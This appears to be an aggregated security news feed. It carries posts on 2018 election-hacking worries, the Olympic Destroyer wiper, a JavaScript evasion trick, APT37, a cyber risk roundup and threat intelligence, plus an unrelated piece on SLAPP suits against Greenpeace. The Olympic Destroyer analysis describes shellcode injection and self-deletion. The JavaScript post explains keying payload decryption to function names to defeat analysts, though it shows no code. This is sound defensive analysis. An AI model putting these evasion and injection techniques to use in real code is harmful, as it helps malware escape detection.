At a conference of state secretaries of state in Washington, several officials said the government was slow to share information about specific threats faced by states during the 2016 election. According to the Department of Homeland Security, Russian government hackers tried to gain access to voter registration files or public election sites in 21 states.

Although the hackers are not believed to have manipulated or removed data from state systems, experts worry that the attackers might be more successful this year. And state officials say reticence on the part of Homeland Security to share sensitive information about the incidents could hamper efforts to prepare for the midterms.

Mueller indictments of Russian cyber criminals put election hacking at top of mind

Granted, the Mueller indictments allege disinformation and propaganda-spreading using social media, not direct election hacking. However, taken together with the attacks on state elections systems, it is now indisputable that Russian cyber criminals used a highly sophisticated, multi-pronged approach to tamper with the 2016 election. While there have been no reported attacks on state systems since, there is no reason to believe that election hacking attempts by Russians or other foreign threat actors will simply cease; if anything, cyber criminals are likely to step up their game during the critical 2018 midterms this November.

These aren’t new issues; cyber security was a top issue leading up to the 2016 election. Everyone agreed then, and everyone continues to agree now, that more needs to be done to prevent election hacking. So, what’s the holdup?

One of the biggest issues in tackling election hacking is the sheer logistics of U.S. elections. The United States doesn’t have one large national “election system”; it has a patchwork of thousands of mini election systems overseen by individual states and local authorities. Some states have hundreds, even thousands of local election agencies; The Washington Post reports that Wisconsin alone has 1,800. To its credit, Wisconsin has encrypted its database and would like to implement multi-factor authentication. However, this would require election employees to have a second device, such as a cell phone, to log in – and not all of them have work-issued phones or even high-speed internet access.

Not surprisingly, funding is also a stumbling block. Even prior to the 2016 elections, cyber security experts were imploring states to ensure that all of their polling places were using either paper ballots with optical scanners or electronic machines capable of producing paper audit trails. However, as we head toward the midterms, five states are still using electronic machines that do not produce audit trails, and another nine have at least some precincts that still lack paper ballots or audit trails. The problem isn’t that these states don’t want to replace their antiquated systems or hire cyber security experts to help them; they simply don’t have the budget to do so.

Congress Must Act to Prevent Election Hacking

Several bills that would appropriate more money for states to secure their systems against election hacking are pending before Congress, including the Secure Elections Act. Congress can also release funding that was authorized by the 2002 Help America Vote Act, but never appropriated.

The integrity of our elections is the cornerstone of our nation’s democracy. Proactive cyber security measures can prevent election hacking, but states cannot be expected to go it alone; cyber attacks do not respect borders.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.

The post States Worry About Election Hacking as Midterms Approach appeared first on .

Olympic Destroyer: A new Candidate in South Korea

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

A new malware has recently made the headlines, targeting several computers during the opening ceremony of the Olympic Games Pyeongchang 2018. While Cisco Talos group, and later Endgame, have recently covered it, we noticed a couple of interesting aspects not previously addressed, we would like to share: its taste for hiding its traces, and the peculiar decryption routine. We also would like to pay attention on how the threat makes use of multiple components to breach the infected system. This knowledge allows us to improve our sandbox to be even more effective against emerging advanced threats, so we would like to share some of them.

The Olympic Destroyer

The malware is responsible for destroying (wiping out) files on network shares, making infected machines irrecoverable, and propagating itself with the newly harvested credentials across compromised networks.

To achieve this, the main executable file (sha1: 26de43cc558a4e0e60eddd4dc9321bcb5a0a181c) drops and runs the following components, all originally encrypted and embedded in the resource section:

  • a browsers credential stealer (sha1: 492d4a4a74099074e26b5dffd0d15434009ccfd9),
  • a system credential stealer (a Mimikatz-like DLL – sha1: ed1cd9e086923797fe2e5fe8ff19685bd2a40072 (for 64-bit OS), sha1: 21ca710ed3bc536bd5394f0bff6d6140809156cf (for 32-bit OS)),
  • a wiper component (sha1: 8350e06f52e5c660bb416b03edb6a5ddc50c3a59).
  • a legitimate signed copy of the PsExec utility used for the lateral movement (sha1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)

A wiper deleting data and logs

The wiper component is responsible for wiping the data from the network shares, but also destroying the attacked system by deleting backups, disabling services (Figure 1), clearing event logs using wevtutil, thereby making the infected machine unusable. The very similar behaviors have been previously observed in other Ransomware/Wiper attacks, including the infamous ones such as BadRabbit and NotPetya.

Disabling Windows services

Figure 1. Disabling Windows services

After wiping the files, the malicious component sleeps for an hour (probably, to be sure that the spawned thread managed to finish its job), and calls the InitiateSystemShutdownExW API with the system failure reason code (SHTDN_REASON_MAJOR_SYSTEM, 0x00050000) to shut down the system.

An unusual decryption to extract the resources

As mentioned before, the executables are stored encrypted inside the binary’s resource section. This is to prevent static extraction of the embedded files, thus slowing down the analysis process. Another reason of going “offline” (compared with e.g. the Smoke Loader) is to bypass any network-based security solutions (which, in turn, decreases the probability of detection). When the malware executes, they are loaded via the LoadResource API, and decrypted via the MMX/SSE instructions sometimes used by malware to bypass code emulation, this is what we’ve observed while debugging it. In this case, however, the instructions are used to implement AES encryption and MD5 hash function (instead of using standard Windows APIs, such as CryptEncrypt and CryptCreateHash) to decrypt the resources. The MD5 algorithm is used to generate the symmetric key, which is equal to MD5 of a hardcoded string “123”, and multiplied by 2.

The algorithms could be also identified by looking at some characteristic constants of

  1. The Rcon array used during the AES key schedule (see figure 2) and,
  2. The MD5 magic initialization constants.

The decrypted resources are then dropped in temporary directory and finally, executed.

Figure 2. AES key setup routine for resources decryption

Hunting

An interesting aspect of the decryption is its usage of the SSE instructions. We exploited this peculiarity and hunted for other samples sharing the same code by searching for the associated codehash, for example. The later is a normalized representation of the code mnemonics included in the function block (see Figure 3) as produced by the Lastline sandbox, and exported as a part of the process snapshots).

Another interesting sample found during our investigation was (sha1: 84aa2651258a702434233a946336b1adf1584c49) with the harvested system credentials belonging to the Atos company, a technical provider of the Pyeongchang games (see here for more details).

Hardcoded credentials of an Olympic Destroyer targeted the ATOS company

Figure 3. Hardcoded credentials of an Olympic Destroyer targeted the ATOS company

A Shellcode Injection Wiping the Injector

Another peculiarity of the Olympic Destroyer is how it deletes itself after execution. While self-deletion is a common practice among malware, it is quite uncommon to see the injected shellcode taking care of it: the shellcode, once injected in a legitimate copy of notepad.exe, waits until the sample terminates, and then deletes it.

Checking whether the file is terminated or still running

Figure 4. Checking whether the file is terminated or still running

This is done first by calling CreateFileW API and checking whether the sample is still running (as shown in Figure 4); it then overwrites the file with a sequence of 0x00 byte, deletes it via DeleteFileW API, and finally exits the process.

The remainder of the injection process is very common and it is similar to what we have described in one of our previous blog posts: the malware first spawns a copy of notepad.exe by calling the CreateProcessW function; then allocates memory in the process by calling VirtualAllocEx, and writes shellcode in the allocated memory through WriteProcessMemory. Finally, it creates a remote thread for its execution via CreateRemoteThread.

Shellcode injection in a copy of notepad.exe

Figure 5. Shellcode injection in a copy of notepad.exe

Lastline Analysis Overview

Figure 6 shows how the analysis overview looks like when analyzing the sample discussed in this article:

Analysis overview of the Olympic Destroyer

Figure 6. Analysis overview of the Olympic Destroyer

Conclusion

In this article, we analyzed a variant of the Olympic Destroyer, a multi-component malware that steals credentials before making the targeted machines unusable by wiping out data on the network shares, and deleting backups. Additionally, the effort put into deleting its traces shows a deliberate attempt to hinder any forensic activity. We also have shown how Lastline found similar samples related to this attack based on an example of the decryption routine, and how we detect them. This is a perfect example of how the threats are continuously improving making them even stealthier, more difficult to extract and analyze.

Appendix: IoCsdivider-2-white

Olympic Destroyer
26de43cc558a4e0e60eddd4dc9321bcb5a0a181c (sample analyzed in this article)
21ca710ed3bc536bd5394f0bff6d6140809156cf
492d4a4a74099074e26b5dffd0d15434009ccfd9
84aa2651258a702434233a946336b1adf1584c49
b410bbb43dad0aad024ec4f77cf911459e7f3d97
 c5e68dc3761aa47f311dd29306e2f527560795e1
 c9da39310d8d32d6d477970864009cb4a080eb2c
fb07496900468529719f07ed4b7432ece97a8d3d

The post Olympic Destroyer: A new Candidate in South Korea appeared first on Lastline.

Control Flow Integrity: a Javascript Evasion Technique

Understanding the real code behind a Malware is a great opportunity for Malware analysts, it would increase the chances to understand what the sample really does. Unfortunately it is not always possible figuring out the "real code", sometimes the Malware analyst needs to use tools like disassemblers or debuggers in order to guess the real Malware actions. However when the Sample is implemented by "interpreted code" such as (but not limited to): Java, Javascript, VBS and .NET there are several ways to get a closed look to the "code”.

Unfortunately attackers know what the analysis techniques are and often they implement evasive actions in order to reduce the analyst understanding or to make the overall analysis harder and harder. An evasive technique could be implemented to detect if the code runs over a VM or it could be implemented in order to run the code only on given environments or it could be implemented to avoid debugging connectors or again to evade reverse-engineering operations such as de-obfuscations techniques. Today "post" is about that, I'd like to focus my readers attention on a fun and innovative way to evade reverse-engineering techniques based on Javascript technology.

Javascript is getting day-by-day more important in term of attack vector, it is often used as a dropper stage and its implementation is widely influenced by many flavours and coding styles but as a bottom line, almost every Javascript Malware is obfuscated. The following image shows an example of obfuscated javascript payload (taken from one analysis of mine).

Example: Obfuscated Javascript


As a first step the Malware analyst would try to de-obfuscate such a code by getting into it. Starting from simple "cut and paste" to more powerful "substitution scripts" the analyst would try to rename functions and variables in order to split complexity and to make clear what code sections do. But in Javascript there is a nice way to get the callee function name which could be used to understand if a function name changed over the time. That function is the arguments.callee.caller. By using that function the attacker can create a stack trace where it saves the executed function chaining name list. The attacker would grab function names and use them as the key to dynamically decrypt specific and crafted Javascript code. Using this technique the Attacker would have an implicit control flow integrity because if a function is renamed or if the function order is slightly different from the designed one, the resulting "hash" would be different. If the hash is different the generated key would be different as well and it wont be able to decrypt and to launch specific encrypted code.

But lets take a closer look to what I meant. The following snip shows a clear (not obfuscated) example explaining this technique. I decided to show not obfuscated code up here just to make it simple.



Each internal stage evaluates ( eval() ) a content. On row 21 and 25 the function cow001 and pyth001 evaluates xor decrypted contents. The xor_decrypt function takes two arguments: decoding_key and the payload to be decrypted. Each internal stage function uses as decryption key the name of callee by using the arguments.callee.name function. If the function name is the "designed one" (the one that the attacker used to encrypt the payload) the encrypted content would be executed with no exceptions. On the other side if the function name is renamed (by meaning has been changed by the analyst for his convenience) the evaluation function would fail and potentially the attacker could trigger a different code path (by using a simple try and catch statement). 

Before launching the Sample in the wild the attacker needs to prepare the "attack path" by developing the malicious Javascript and by obfuscating it. Once the obfuscation took place the attacker needs to use an additional script (such as the following one) to encrypt the payloads according to the obfuscated function names and to replace the newly encrypted payload to the final and encrypted Javascipt file replacing the encrypted payloads with the one encrypted having as a key the encrypted function names.

The attacker is now able to write a Javascript code owning its own control flow. If the attacker iterates such a concept over and over again,  he would block or control the code execution by hitting a complete reverse-engineering evasion technique.
  
Watch it out and be safe !

APT37 (Reaper): The Overlooked North Korean Actor

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).

Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123.

Read our report, APT37 (Reaper): The Overlooked North Korean Actor, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:

  • Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.
  • Initial Infection Tactics: Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.
  • Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.
  • Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.
  • Malware: A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.

More information on this threat actor is found in our report, APT37 (Reaper): The Overlooked North Korean Actor. You can also register for our upcoming webinar for additional insights into this group.

It’s Five O’Clock Somewhere – Business Security Weekly #74

This week, Michael and Paul interview Joe Kay, Founder & CEO of Enswarm! In the Tracking Security Information segment, IdentityMind Global rasied $10M, DataVisor raised $40M, & Infocyte raised $5.2M! Last but not least, our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/BSWEpisode74

 

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Weekly Cyber Risk Roundup: Olympic Malware and Russian Cybercrime

More information was revealed this week about the Olympic Destroyer malware and how it was used to disrupt the availability of the Pyeonchang Olympic’s official website for a 12-hour period earlier this month.

It appears that back in December, a threat actor may have compromised the computer system’s of Atos, an IT service provider for the Olympics, and then used that  access to perform reconnaissance and eventually spread the destructive wiper malware known as “Olympic Destroyer.”

The malware was designed to delete files and event logs by using legitimate Windows features such as PsExec and Windows Management Instrumentation, Cisco researchers said.

Cyberscoop reported that Atos, which is hosting the cloud infrastructure for the Pyeongchang games, was compromised since at least December 2017, according to VirusTotal samples. The threat actor then used stolen login credentials of Olympics staff in order to quickly propagate the malware.

An Atos spokesperson confirmed the breach and said that investigations into the incident are continuing.

“[The attack] used hardcoded credentials embedded in a malware,” the spokesperson said. “The credentials embedded in the malware do not indicate the origin of the attack. No competitions were ever affected and the team is continuing to work to ensure that the Olympic Games are running smoothly.”

The Olympic Destroyer malware samples on VirusTotal contained various stolen employee data such as usernames and passwords; however, it is unclear if that information was stolen via a supply-chain attack or some other means, Cyberscoop reported.

2018-02-17_ITTGroup

Other trending cybercrime events from the week include:

  • Organizations expose data: Researchers discovered a publicly exposed Amazon S3 bucket belonging to Bongo International LLC, which was bought by FedEx in 2014, that contained more than 119 thousand scanned documents of U.S. and international citizens. Researchers found a publicly exposed database belonging to The Sacramento Bee that contained information on all 19 million registered voters in California, as well as internal data such as the paper’s internal system information, API information, and other content. Researchers discovered a publicly exposed network-attached storage device belonging to the Maryland Joint Insurance Association that contained a variety of sensitive customer information and other credentials. The City of Thomasville said that it accidentally released the Social Security numbers of 269 employees to someone who put in a public record request for employee salaries, and those documents were then posted on a Facebook page.
  • Notable phishing attacks: The Holyoke Treasurer’s Office in Massachusetts said that it lost $10,000 due to a phishing attack that requested an urgent wire payment be processed. Sutter Health said that a phishing attack at legal services vendor Salem and Green led to unauthorized access to an employee email account that contained personal information for individuals related to mergers and acquisitions activity. The Connecticut Airport Authority said that employee email accounts were compromised in a phishing attack and that personal information may have been compromised as a result.
  • User and employee accounts accessed: A phishing attack led to more than 50,000 Snapchat users having their credentials stolen, The Verge reported. A hacker said that it’s easy to brute force user logins for Freedom Mobile and gain access to customers’ personal information. Entergy is notifying employees of a breach of W-2 information via its contractor’s website TALX due to unauthorized individuals answering employees’ personal questions and resetting PINs.
  • Other notable events: Makeup Geek is notifying customers of the discovery of malware on its website that led to the theft of personal and financial information entered by visitors over a two-week period in December 2017. The Russian central bank said that hackers managed to steal approximately $6 million from a Russian bank in 2017 in an attack that leveraged the SWIFT messaging system. Western Union is informing some customers of a third-party data breach at “an external vendor system formerly used by Western Union for secure data storage” that may have exposed their personal information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.

2018-02-17_ITTLarger

Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresThe U.S. government issued a formal statement this past week blaming the Russian military for the June 2017 outbreak of NotPetya malware. Then on Friday, the day after the NotPetya accusations, the Justice Department indicted 13 Russian individuals and three Russian companies for using information warfare to interfere with the U.S. political system, including the 2016 presidential election. Those stories have once again pushed the alleged cyber activities of the Russian government into the national spotlight.

A statement on NotPetya from White House Press Secretary Sarah Huckabee Sanders described the outbreak as “the most destructive and costly cyber-attack in history” and vowed that the “reckless and indiscriminate cyber-attack … will be met with international consequences.” Newsweek reported that the NotPetya outbreak, which leveraged the popular Ukrainian accounting software M.E. Doc to spread, cost companies more than $1.2 billion. The United Kingdom also publicly blamed Russia for the attacks, writing in a statement that “malicious cyber activity will not be tolerated.” A spokesperson for Russian President Vladimir Putin denied the allegations as “the continuation of the Russophobic campaign.”

It remains unclear what “consequences” the U.S. will impose in response to NotPetya. Politicians are still urging President Trump to enforce sanctions on Russia that were passed with bipartisan majorities in July. Newsday reported that congressmen such as democratic Sen. Chuck Schumer and republican representative Peter King have urged those sanctions to be enforced following Friday’s indictment of 13 Russians and three Russian companies.

The indictment alleges the individuals attempted to “spread distrust” towards U.S. political candidates and the U.S. political system by using stolen or fictitious identities and documents to impersonate politically active Americans, purchase political advertisements on social media platforms, and pay real Americans to engage in political activities such as rallies. For example, the indictment alleges that after the 2016 presidential election, the Russian operatives staged rallies both in favor of and against Donald Trump in New York on the same day in order to further their goal of promoting discord.

As The New York Times reported, none of those indicted have been arrested, and Russia is not expected to extradite those charged to the U.S. to face prosecution. Instead, the goal is to name and shame the operatives and make it harder for them to work undetected in future operations.

Evolving to Security Decision Support: Data to Intelligence

Posted under: Research and Analysis

As we kicked off our Evolving to Security Decision Support series, the point we needed to make was the importance of enterprise visibility to the success of your security program. Given all the moving pieces in your environment – including the usage of various clouds (SaaS and IaaS), mobile devices, containers, and eventually IoT devices – it’s increasingly hard to know where all your critical data is and how it’s being used.

So enterprise visibility is necessary, but not sufficient. You still need to figure out whether and how you are being attacked, as well as whether and how data and/or apps are being misused. Nobody gets credit just for knowing where you can be attacked. You get credit for stopping attacks and protecting critical data. Ultimately that’s all that matters. The good news is that many organizations already collect extensive security data (thanks, compliance!), so you have a base to work with. It’s really just a matter of turning all that security data into actual intelligence you can use for security decision support.

The History of Security Monitoring

Let’s start with some historical perspective on how we got here, and why many organizations already perform extensive security data collection. It all started in the early 2000s with deployment of the first SIEM, deployed to make sense of the avalanche of alerts coming from firewalls and intrusion detection gear. You remember those days, right?

SIEM evolution was driven by the need to gather logs and generate reports to substantiate controls (thanks again, compliance!). So the SIEM products focused more on storing and gathering data than actually making sense of it. You could generate alerts on things you knew to look for, which typically meant you got pretty good at finding attacks you had already seen. But you were pretty limited in ability to detect attacks you hadn’t seen.

SIEM technology continues to evolve, but mostly to add scale and data sources to keep up with the number of devices and amount of activity to be monitored. But that doesn’t really address the fact that many organizations don’t want more alerts – they want better alerts. To provide better alerts, two separate capabilities have come together in an interesting way:

  1. Threat Intelligence: SIEM rules were based on looking for what you had seen before, so you were limited in what you could look for. What if you could leverage attacks other companies have seen and look for those attacks, so you could anticipate what’s coming? That’s the driver for external threat intelligence.

  2. Security Analytics: The other capability isn’t exactly new – it’s using advanced math to look at the security data you’ve already collected to profile normal behaviors, and then look for stuff that isn’t normal and might be malicious. Call it anomaly detection, machine learning, or whatever – the concept is the same. Gather a bunch of security data, build mathematical profiles of normal activity, then look for activity that isn’t normal.

Let’s consider both these capabilities to gain a better understanding how they work, and then we’ll be able to show how powerful integrating them can be for generating better alerts.

Threat Intel Identifies What Could Happen

Culturally, over the past 20 years, security folks were generally the kids who didn’t play well in the sandbox. Nobody wanted to appear vulnerable, so data breaches and successful attacks were the dirty little secret of security. Sure, they happen, but not to us. Yeah, right. There were occasional high-profile issues (like SQL*Slammer) which couldn’t be swept under the rug, but they hit everyone so weren’t that big a deal.

But over the past 5 years a shift has occurred within security circles, borne out of necessity as most such things are. Security practitioners realized no one is perfect, and we can collectively improve our ability to defend ourselves by sharing information about adversary tactics and specific indicators from those attacks. This is something we dubbed “benefiting from the misfortune of others” a few years ago. Everyone benefits because once one of us is attacked, we all learn about that attack and can look for it. So the modern threat intelligence market emerged.

In terms of the current state of threat intel, we typically see the following types of data shared within commercial services, industry groups/ISACs, and open source communities:

  • Bad IP Addresses: IP addresses which behave badly, for instance by participating in a botnet or acting as a spam relay, should probably be blocked at your egress filter, because you know no good will come from communicating with that network. You can buy a blacklist of bad IP addresses, probably the lowest-hanging fruit in the threat intel world.
  • Malware Indicators: Next-generation attack signatures can be gathered and shared to look for activity representative of typical attacks. You know these indicate an attack, so being able to look for them within your security monitors helps keep your defenses current.

The key value of threat intel is to accelerate the human, as described in our Introduction to Threat Operations research. But what does that even mean? To illustrate a bit, let’s consider retrospective search. This involves being notified of a new attack via a threat intel feed, and using those indicators to mine your existing security data to see if you saw this attack before you knew to look for it: retrospective search. Of course it would be better to detect the attack when it happens, but the ability to go back and search for new indicators in old security data shortens the detection window.

Another use of threat intel is to refine your hunting process. This involves having a hunter learn about a specific adversary’s tactics, and then undertake a hunt for that adversary. It’s not like the adversary is going to send out a memo detailing its primary TTPs, so threat intel is the way to figure out what they are likely to do. This makes the hunter much more efficient (“accelerating the human”) by focusing on typical tactics used by likely adversaries.

Much of the threat intel available today is focused on data to be pumped into traditional controls, such as SIEM and egress filters. There is an emerging need for intel on new areas of exposure including the cloud, IoT, and mobility. As more attacks leverage these new attack vectors, more data becomes available, making us all better. But in the meantime there is a clear gap in the data available to feed these emerging technologies.

Yet effectively leveraging threat intel alone cannot realize the full potential of Security Decision Support. Knowing what could happen is very helpful. But you still end up with a long list of stuff to triage and potentially remediate, and little real context to prioritize those efforts. That’s where analytics comes in.

Analytics Identifies What Is Happening

The SIEM has historically been algorithmically challenged because its correlation engine was designed to alert on activity you knew to look for. It doesn’t help much with stuff you haven’t seen. Thus, as happens in markets like security, new approaches emerged to fill the gaps in incumbent technologies. Security analytics is a case in point.

Security analytics is conceptually simple. Use advanced math to establish a baseline of activity in the mass of collected security data. Then look for situations which could indicate malicious activity or misuse of critical systems or data. In reality, of course, it’s anything but simple.

The basic technology underlying security analytics tools is anomaly detection. You remember that, right? Security analytics vendors come up with fancy terms, but at its core this isn’t new. We have been looking for anomalies in our security data for over a decade. Remember Network-Based Anomaly Detection (NBAD)? We certainly do (being security historians and all) and that was the first “security analytics” offering we remember.

To be clear, NBAD worked and still does. The technology has been wrapped up into a variety of different offerings so there aren’t really stand-alone NBAD companies anymore, but the approach has evolved and morphed into what we now call security analytics. So what’s different now? First, you can analyze a lot more data, a lot more efficiently. Instead of just looking at network flow records (like in the NBAD days), you can now look at detailed network packet data, endpoint telemetry, log activity from pretty much all devices and applications in use, and even potentially transaction data, and then build a baseline to learn what is normal activity in your environment.

Most enterprise networks are pretty complicated (and getting more so), so building a baseline across a number of seemingly unrelated security data sources is challenging. So to simplify things a bit you can start by looking at different use cases to chunk up the universe of activity into a manageable set to get a reasonable place to start.

For example you might want to find compromised devices. One way to do that is to look for devices doing strange things which could indicate misuse. Typically someone in Finance shouldn’t be reconnoitering devices in Engineering. Or vice-versa. That’s not normal, and as such should probably be investigated. So paying attention to device behavior to detect malware is a common use for security analytics.

Along with device behavior, you could also expand the purview of analysis to include broader insider threats by building a baseline for how specific employees use their devices (called User Behavior Analytics: UBA). Then when an employee does something funky, like connecting to the finance system from a tablet at home, you can flag that as something to look at.

You could extend that use case to broader analysis by adding data from physical access systems (to see when an employee is in the office), as well as HR records (an employee under investigation, or considered a flight risk). Or you could look at employee usage of specific applications, especially the ones accessing critical proprietary corporate data. From all this data you can profiling employee usage and transaction patterns. That provides a baseline to help identify activity which should be investigated.

Security analytics provides you not with a list of things to look for (like threat intel or threat modeling), but a list of things happening in your environment, providing more actionable alerts which likely warrant investigation.

Yet security analytics on its own also doesn’t rise to the standard of Security Decision Support. The analytics can identify things you need to look for, but you still don’t have a sense of importance or prioritization relative to the other things the analytics platform is alerting on. So we need to ask a few more questions of the system to understand how to make better decisions.

Driving Security Decisions

Now that you have an understanding of which attacks are being used in the wild (via threat intel) and which systems/users/applications are potentially being misused, the next step is to use that context to drive action. But what action? How do you prioritize all the things (both internal and external) that should be looked at? You need to balance the following to effectively decide which actions will be most impactful in your environment:

  • Asset/Data Value: There are corporate systems and data which are important to your company. When this kind of stuff is compromised, heads roll – probably yours. So obviously you are going to prioritize potential situations involving these systems or users above others. This is a subjective measure of value, so it requires a bunch of discussion with senior management to understand the values of various systems. But if you want to stay employed you need to factor asset value into the mix – you don’t have the resources or time to do everything.
  • Confidence: False positives hurt you by wasting time on stuff which turns out to be nothing. Reducing this wasted time is possible by tracking the confidence you have in your data/intel sources and analytical techniques. Obviously if a specific intel source sends you crap, you should not jump when it alerts. Likewise if a bunch of alerts based on a user’s mobile activity turn out to be much ado about nothing, you should de-emphasize that source over time. Yet if you do find something via retrospective search that indicates an attack, that should be high-priority since you know the attack is legitimate and happening in your environment.
  • Internal Skills/Resources: The industry is making progress at automating some security activities, but there still seems to be an infinite amount of work to do. You also need to consider the skills at your disposal to prioritize. If you are weak at Tier 1 response because your front-line staffers keep getting poached by consulting firms, you may want to send alerts that might be urgent directly to Tier 2. Similarly, if you know your Tier 3 folks get into deep water on file-less attacks, you may want to just quarantine those devices until your external forensics team can take a look.

This kind of process requires the ability to measure effectiveness of both threat intel and analytics over time. A gut feel isn’t the best tool to determine which sources work best. The sooner you start quantifying value the better. Not just for better prioritization but also to save money. If you are spending money on sources or analytics platforms which don’t provide value, stop.

By leveraging threat intel and more advanced security analytics, we have narrowed the aperture of all the things you could look at, to help identify what you need to look at. We won’t claim this makes your to-do list manageable, but every bit helps. By focusing on likely attacks (according to threat intel) on devices which are acting abnormally, while considering the value of the asset being attacked and your confidence in the data, it’s far more likely you will focus on the attacks which matter.

This is what Security Decision Support is all about. Enabling you to make the best use of your available resources by working smarter, leveraging technology and external resources to improve the effectiveness of your security team.

To wrap up this series our next post will focus on how better and more contextual alerts can favorably impact security operations, and which integrations are required to make that vision a reality.

- Mike Rothman (0) Comments Subscribe to our daily email digest

Dangerous lawsuit against Greenpeace threatens news organizations and First Amendment


A harrowing lawsuit poses a serious threat to the First Amendment and press freedom, but it isn’t coming from legal action against a newspaper. Instead, it originates from legal action against environmental advocacy organizations.

Last year, Greenpeace—along with countless other environmental and human rights groups—reported on and advocated against the construction of the Dakota Access Pipeline due to environmental and human and indigenous rights concerns. In response, a company behind DAPL, Energy Transfer Partners (ETP), is suing Greenpeace, along with small Dutch organization BankTrack.

The lawsuit also names Earth First!, which it calls a “radical eco-terrorist group.” But because Earth First! is not an organization but rather a environmental movement and idea, the legal complaint was mailed to small environmental news publication called Earth First! Journal.

Filed last August, the $900 million lawsuit accuses them of defamation and racketeering, and essentially calls them a criminal enterprise. On February 8, ETP filed its opposition memo to Greenpeace’s motion to dismiss the lawsuit, but the organizations continue to fight to have it dismissed.

When we talk about censorship, we often center government actors. But increasingly serious threats to advocacy and free expression are also being brought by corporations. Lawsuits like ETP’s against Greenpeace—called strategic lawsuits against public participation (SLAPP)—are a kind of privatized censorship. As their name implies, SLAPP lawsuits are a tool used by corporations to silence critics and First Amendment-protected speech. They are often filed not because the plaintiff thinks they can win, but to harass and bleed the defendant of funds, and hopefully make them think twice about public criticism in the future.

In the suit, ETP alleges that the defendants engaged in criminal conspiracy to defame the company. ETP further claims that Greenpeace ran a media campaign that aimed to cut the company’s profits through its criticism and campaign for divestment in the company, and therefore should be punished.  As the ACLU wrote, if ETP’s theory were adopted by courts, “Public campaigns, routine fundraising appeals, conversations with allies, and vindication of legal rights, in court could all be targeted.”

Outrageously, ETP is attempting to hold Greenpeace responsible for acts such as property destruction committed by completely unaffiliated groups and individuals simply because they advocated against the construction of a pipeline. Greenpeace is not even alleged to have done anything violent themselves.

“ETP’s theory would deter speech and association related to any issue that might provoke various forms of protest, that is to say, almost any controversial matter of public import about which people hold passionate views—the decision to go to war, the barring of immigrants from certain nations, the boundaries of police officers’ actions, the legality of abortion, and the tension between federal authority and local control, to name just a few,” the ACLU wrote in its amicus brief strongly opposing the lawsuit.

The press freedom implications of this claim are chilling. Say a news organization like the Washington Post publishes a story about activists boycotting internet services providers who refuse to treat digital content neutrality. Under this legal theory, internet service providers could conceivably sue the Washington Post and try to hold it responsible for the actions of unaffiliated individuals or groups because they read the story and took independent action.

ETP’s lawsuit is especially concerning because they are also claiming violations under the Racketeer Influenced and Corrupt Organizations Act (RICO), a sweeping law that originally intended to address organized crime like the mafia. It provides for extended penalties for acts performed as an alleged “criminal enterprise,” and it also prescribes damages of triple the amount claimed by the plaintiff.

Parties that bring SLAPP lawsuits don’t necessarily aim to win — instead, they are designed to intimidate their targets into silence on issues of public significance. Even filing such a suit drains their targets of energy and resources, and diverts defendants’ staff energy and time that would have been spent on advocacy work to drawn out litigation. BankTrack, one of the defendants in the ETP lawsuit, doesn’t have libel insurance, and because it’s based in the Netherlands, insurance would be unlikely to help with lawsuits filed in the United States. Corporations attempt to inhibit political advocacy work by making fighting the suit in court so overwhelmingly expensive that organizations abandon their position or risk their very survival.

Greenpeace, thankfully, refuses to bow to intimidation. Tom Wetterer, General Counsel for Greenpeace USA, told the Freedom of the Press Foundation that the lawsuit has only underscored the importance of Greenpeace’s work and emboldens the organization to fight even harder for environmental and humans rights.

This isn’t the first time Greenpeace has been targeted by corporations in SLAPP suits. The year before the ETP lawsuit in May 2016, logging company Resolute Forest Products filed a similar RICO SLAPP suit in which Greenpeace is also a defendant. It also alleged that Greenpeace’s campaigns against logging amounted to criminal enterprise, suing the nonprofit for approximately $300 million. While this suit was dismissed in October 2017 after a judge found that Resolute had not made proper legal claims, the company has amended its complaint and the case might not resolve for many months.

When the Resolute case was dismissed, Greenpeace executive director Annie Leonard wrote, “If it had won, Greenpeace USA would likely have been forced to close its doors.” These lawsuits could not just silence but shut down organizations completely, chilling their crucial advocacy work.

Resolute Forest Products is North America’s largest newsprint producer. While newspapers across the country are doing important work of publishing the news and keeping the public informed, they are doing so on materials produced by a company attempting to silence free expression.

Donald Trump’s former law firm, Kasowitz and Benson Torres LLC, is representing both Resolute and ETP in the suits.

It’s difficult to overstate the implications of these lawsuits for journalism and news organizations. While Greenpeace isn’t a news organization, this type of legal action has huge implications for news organizations. The use of defamation lawsuits by corporations as a tool for draining organizations of resources that publish critical speech is, disturbingly, increasingly frequent.

